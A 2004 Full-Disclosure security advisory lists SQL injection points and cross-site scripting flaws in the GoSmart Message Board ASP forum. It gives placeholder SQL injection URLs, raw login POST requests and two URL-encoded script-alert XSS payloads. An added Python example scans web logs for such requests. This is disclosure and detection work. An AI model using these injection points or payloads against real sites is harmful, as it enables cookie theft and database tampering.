[Full-Disclosure] [MAxpatrol Security Advisory] Multiple vulnerabilities in GoSmart Message Board

From: Alexander Antipov (antipovSecurityLab.ru)
Date: Mon Oct 11 2004 - 13:51:07 CDT


This vulnerability was discovered by Positive Technologies using
MaxPatrol (www.maxpatrol.com), an intelligent professional security
scanner. It is able to detect a substantial number of vulnerabilities
that have not yet been published. MaxPatrol's intelligent algorithms are
also capable of detecting many vulnerabilities in custom web scripts
(XSS, SQL and code injection, HTTP response splitting).
 

Date: 11.10.04

Severity: Low

 

Application: GoSmart Message Board, http://www.gosmart4u.com/forum.aspx

 

Platform: ASP

 

I. DESCRIPTION

--------------

Multiple vulnerabilities were found in GoSmart Message Board. A remote
user can conduct SQL injection and cross-site scripting attacks.

1. SQL injection (minimal risk, because the application uses an Access
database)

 
messageboard/Forum.asp?QuestionNumber=[SQL CODE HERE]&Find=1&Category=1

messageboard/Forum.asp?Username=&Category=[SQL CODE HERE]

messageboard/Forum.asp?QuestionNumber=[SQL CODE HERE]&Find=1

messageboard/Forum.asp?Category=[SQL CODE HERE]

POST /messageboard/Login_Exec.asp HTTP/1.1
Host: www.gosmart4u.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

Username=[SQL CODE HERE]&Password=1&Login=1

POST /messageboard/Login_Exec.asp HTTP/1.1
Host: www.gosmart4u.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

Username=1&Password=[SQL CODE HERE]&Login=1

 
2. XSS:

/messageboard/Forum.asp?QuestionNumber=1&Find=1&Category=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E%3C%22

/messageboard/ReplyToQuestion.asp?MainMessageID=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E%3C%22

 

II. IMPACT

----------

A remote user can access the target user's cookies (including
authentication cookies).

A remote user can cause SQL commands to be executed by the underlying
database.

 

III. SOLUTION

-------------
Not available currently.

 

IV. VENDOR FIX/RESPONSE

-----------------------
n/a
 

V. CREDIT

-------------
Positive Technologies (www.ptsecurity.com) is an information security
company especially focused on the development of MaxPatrol, a
professional security scanner.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
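
Since the advisory lists no fix, the following added example (not part of the original advisory or of GoSmart's code) shows one way to spot requests against the affected GET parameters in web-server access logs. It assumes Common Log Format entries and that QuestionNumber, Category and MainMessageID are integer ids (the advisory only shows the value 1); the sample log entries are constructed. The Login_Exec.asp POST fields are not covered, because request bodies do not normally appear in access logs.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts and query parameters named in the advisory, lower-cased because
# IIS treats paths case-insensitively and ASP does the same for parameter names.
AFFECTED = {
    "/messageboard/forum.asp": {"questionnumber", "category"},
    "/messageboard/replytoquestion.asp": {"mainmessageid"},
}
# Assumption: these parameters are numeric ids (the advisory only shows "1").
INTEGER = re.compile(r"[0-9]+")
# Request line inside a Common Log Format entry (assumed log layout).
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[0-9.]+"')


def suspicious_params(target):
    """Return (name, decoded value) pairs that are not plain integers."""
    parts = urlsplit(target)
    names = AFFECTED.get(parts.path.lower(), set())
    return [
        (name, value)
        for name, value in parse_qsl(parts.query, keep_blank_values=True)
        if name.lower() in names and value and not INTEGER.fullmatch(value)
    ]


def scan(lines):
    """Return (line number, parameter, decoded value) for every flagged request."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if match:
            for name, value in suspicious_params(match.group(1)):
                findings.append((number, name, value))
    return findings


# Constructed sample entries (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Oct/2004:13:40:01 -0500] "GET /messageboard/Forum.asp?QuestionNumber=12&Find=1&Category=3 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [11/Oct/2004:13:41:09 -0500] "GET /messageboard/Forum.asp?QuestionNumber=1&Find=1&Category=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E%3C%22 HTTP/1.1" 200 5301',
    '192.0.2.10 - - [11/Oct/2004:13:42:30 -0500] "GET /messageboard/Search.asp?Category=news HTTP/1.1" 200 1800',
    '192.0.2.78 - - [11/Oct/2004:13:43:02 -0500] "GET /MessageBoard/ReplyToQuestion.asp?MainMessageID=7%27 HTTP/1.1" 500 310',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Values are reported after one round of URL decoding, so a doubly encoded value would need a second pass before the integer check.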